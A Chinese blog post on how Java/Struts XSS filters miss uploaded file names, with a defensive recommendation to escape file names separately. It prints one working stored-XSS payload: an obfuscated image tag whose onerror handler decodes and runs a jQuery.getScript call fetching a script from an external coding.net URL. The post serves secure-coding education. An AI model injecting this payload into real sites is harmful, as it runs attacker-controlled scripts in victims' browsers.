XSS漏洞--文件名

java處理xss漏洞的方法一般是配個filter,例如:

chain.doFilter(new XssHttpServletRequestWraper((HttpServletRequest) request), response);

寫個HttpServletRequestWrapper的子類XssHttpServletRequestWraper,重寫getParameter等方法(過濾),封裝request,然后繼續(xù)執(zhí)行filter鏈。(這部分會在之后會寫一篇說明)

但是文件名獲取不會走新寫的request包裝包裝器類,如果不加處理,存在存儲型xss漏洞。

例如:

文件名:<img src=x id=alF1ZXJ5LmdldFNjcmlwdCgiaHR0cHM6Ly9jb2RpbmcubmV0L3UveWFuZ3hpYW9kaS9wL3Rlc3QxL2dpdC9yYXcvbWFzdGVyLzMuanMiKQ onerror=eval(atob(this.id))>2.png"

atob是base64解碼方法,解碼之后jQuery.getScript("https://coding.net/u/yangxiaodi/p/test1/git/raw/master/3.js")

如果沒有得到過濾,前端獲取到文件名渲染時不經(jīng)過轉(zhuǎn)義(服務(wù)器存文件時未改名字),會執(zhí)行js腳本導(dǎo)致xss攻擊。

下文以struts為例說明


struts

流程:1.走自己寫的xssfilter,封裝request。?

? ? ? ? ? 2.走struts的filter dispatcher,dofilter方法中會調(diào)用prepareDispatcherAndWrapRequest方法,prepare方法中根據(jù)contentType為multipart/form-data,使用MultiPartRequestWrapper封裝request. 其他情況用StrutsRequestWrapper封裝

?3.使用StrutsRequestWrapper封裝的情況下,調(diào)用getParameter,gerHeader等方法,都會經(jīng)過自己寫的filter類的。

4.MultiPartRequestWrapper?

public StringgetParameter(String name) {

? ? return ((multi ==null) || (multi.getParameter(name) ==null)) ?super.getParameter(name) :multi.getParameter(name);

}

其中multi中包含文件名的參數(shù),所以獲取文件名不會走自己寫的filter類。


綜上,文件名需要單獨處理。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • Spring Cloud為開發(fā)人員提供了快速構(gòu)建分布式系統(tǒng)中一些常見模式的工具(例如配置管理,服務(wù)發(fā)現(xiàn),斷路器,智...
    卡卡羅2017閱讀 136,554評論 19 139
  • 本文包括:1、Filter簡介2、Filter是如何實現(xiàn)攔截的?3、Filter開發(fā)入門4、Filter的生命周期...
    廖少少閱讀 7,520評論 3 56
  • 1、不安全的隨機數(shù)生成,在CSRF TOKEN生成、password reset token生成等,會造成toke...
    nightmare丿閱讀 3,994評論 0 1
  • 之前積累了XSS 有一段時間,因為目前開始了一件有趣的工程,需要整合非常多的知識,其中Web 安全這一塊出現(xiàn)最多的...
    刀背藏身閱讀 9,561評論 0 16
  • 聽完夏の終わり突然腦子里有滿滿的畫面,想寫一首詩。 靜悄悄的夏夜 在蟲鳴聲中踏著螢火的光 走過蛙聲一片的稻田 腳步...
    桑怡談知識變現(xiàn)閱讀 216評論 0 0

友情鏈接更多精彩內(nèi)容